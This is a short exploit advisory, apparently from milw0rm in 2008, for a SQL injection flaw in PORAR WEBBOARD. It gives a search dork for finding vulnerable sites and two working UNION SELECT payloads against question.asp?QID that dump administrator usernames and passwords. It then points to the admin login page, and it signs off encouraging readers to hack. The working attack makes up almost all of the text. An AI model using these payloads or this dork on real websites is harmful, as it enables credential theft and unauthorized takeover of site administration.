## ##
## ##
## ##
###CoRPITX
###
## ##
## ##
## ##
########################### Turkey ####################################
# #
#################### www.Hayalet-hack.com #############################
#
##################### www.zone-turk.net/###############################
#
# PORAR WEBBOARD SQL Injection Vulnerability
#
#######################################################################
#
# AUTHOR : xcorpitx
#
# HOME : www.Hayalet-hack.com / www.zone-turk.net
#
# email : xcorpitx@hotmail.com
#
########################################################################
# This (SQL) give Admin name and Admin password
# Bu sorgu direk admin ismi ve sisresini verecektir
########################################################################
#
# DorK : '' webboard question.asp QID''
#
########################################################################
#
# EXPLOIT:
#
########################################################################
# example 1 : columns number 10
#
question.asp?QID=-1122334455%20+%20union%20+%20select%20+%200,null,2,username,password,5,password,7,8,9,null%20+%20from%20+%20+%20administrator%20';';
#########################################################################
# some týmes thýs sql
# example 2 : columns number 11
#
question.asp?QID=-1%20+%20union%20+%20select%20+%200,1,2,username,4,5,password,7,8,9,10,11%20+%20from%20+%20+%20administrator%20';';
#########################################################################
# admin login
#
http://www.xxx.com/webboard/admin/login.asp
#
########################################################################
Thanx : str0ke,D3ng3s!z,Pc faresi,Hayalet,Turque,SmoKin,Apex,Mostbiq
have nice day and hack
i m sory jane :(
Kankilerim D3ng3s!z ve Pc faresi ne sevgiler el sallayin :S
# milw0rm.com [2008-02-25]
